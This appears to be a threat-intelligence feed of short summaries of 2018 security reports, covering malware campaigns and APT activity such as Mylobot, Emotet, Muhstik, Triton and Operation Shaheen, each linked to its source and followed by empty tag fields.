CenturyLink Threat Research Labs has been tracking the Mylobot botnet, a sophisticated malware family that is categorized as a downloader. What makes Mylobot dangerous is its ability to download and execute any type of payload after it infects a host. This means at any time it could download any other type of malware the attacker desires. A detailed walkthrough and reverse engineering analysis of Mylobot was first reported in June by Deep Instinct. During the time we have been monitoring Mylobot we have observed it downloading the Khalesi malware as a second stage to infected hosts. Kaspersky Lab reports that the information stealing Khalesi malware is one of the top downloaded malware families in 2018.

REFERENCE:
https://www.netformation.com/our-pov/mylobot-continues-global-infections/
TAG:

Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development. We believe both attacks used the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope’s interest in the U.K. engineering company they targeted dates back to attempted intrusions in May 2017.

REFERENCE:
https://go.recordedfuture.com/hubfs/reports/cta-2018-1113.pdf
ADVERSARY:
INDUSTRIES:
TARGETED COUNTRY:

Profiling the Groups Behind the Front Page Credit Card Breaches and the Criminal Underworld that Harbors Them

REFERENCE:
https://cdn.riskiq.com/wp-content/uploads/2018/11/RiskIQ-Flashpoint-Inside-MageCart-Report.pdf
TAG:
INDUSTRY:

Operation Shaheen was an espionage campaign executed over the course of the last year. It was a targeted campaign which appeared to focus on individuals and organizations in Pakistan, specifically the government and the military.

REFERENCE:
https://threatvector.cylance.com/en_us/home/the-white-company-inside-the-operation-shaheen-espionage-campaign.html
GROUP:
ADVERSARY:
INDUSTRIES:
TARGETED COUNTRY:

In late October, security researchers from Cymulate showed a proof of concept (PoC) exploiting a logic bug that could allow hackers to abuse the online video feature in Microsoft Office to deliver malware. We indeed identified an in-the-wild sample (detected by Trend Micro as TROJ_EXPLOIT.AOOCAI) in VirusTotal, using this method to deliver the URSNIF information stealer (TSPY_URSNIF.OIBEAO).

REFERENCE:
https://blog.trendmicro.com/trendlabs-security-intelligence/hide-and-script-inserted-malicious-urls-within-office-documents-embedded-videos/
TAG:

The Muhstik botnet was first exposed by Netlab360 researchers in May 2018. This botnet targeted mainly GPON routers. At Intezer we found that Muhstik is extending its spectrum of compromised devices by targeting web servers hosting phpMyAdmin.

REFERENCE:
https://www.intezer.com/muhstik-botnet-reloaded-new-variants-targeting-phpmyadmin-servers/
TAG:
ADVERSARY:

Emotet is a banking Trojan family notorious for its modular architecture, persistence techniques, and worm-like self-propagation. It is distributed through spam campaigns employing a variety of seemingly legitimate guises for their malicious attachments. The Trojan is often used as a downloader or dropper for potentially more-damaging, secondary payloads. Due to its high destructive potential, Emotet was the subject of a US-CERT security notice in July 2018. According to our telemetry, the latest Emotet activity was launched on November 5, 2018, following a period of low activity. Figure 1 shows a spike in the Emotet detection rate in the beginning of November 2018, as seen in our telemetry data.

REFERENCE:
https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

REFERENCE:
https://securingtomorrow.mcafee.com/mcafee-labs/triton-malware-spearheads-latest-generation-of-attacks-on-industrial-systems/
ADVERSARY:
INDUSTRY:
TARGETED COUNTRY:

Targeted attack that used a language-specific word processor shows why it’s important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor software for specific languages like Urdu, Persian, Pashto, and Arabic. More than 75% of the targets were located in Pakistan; however, the attack also found its way into some countries in Europe and the US. The targets included government institutions.

REFERENCE:
https://cloudblogs.microsoft.com/microsoftsecure/2018/11/08/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets/
TARGETED COUNTRIES:

A hacker group likely supported by North Korea has launched an advanced persistent threat (APT) attack by inserting malicious code in a popular South Korean security program. APT attacks are typically characterized by being sophisticated, long-term attacks aimed at monitoring information and stealing data rather than immediately causing damage to a network or organization.

REFERENCE:
http://blog.alyac.co.kr/m/1963
GROUP: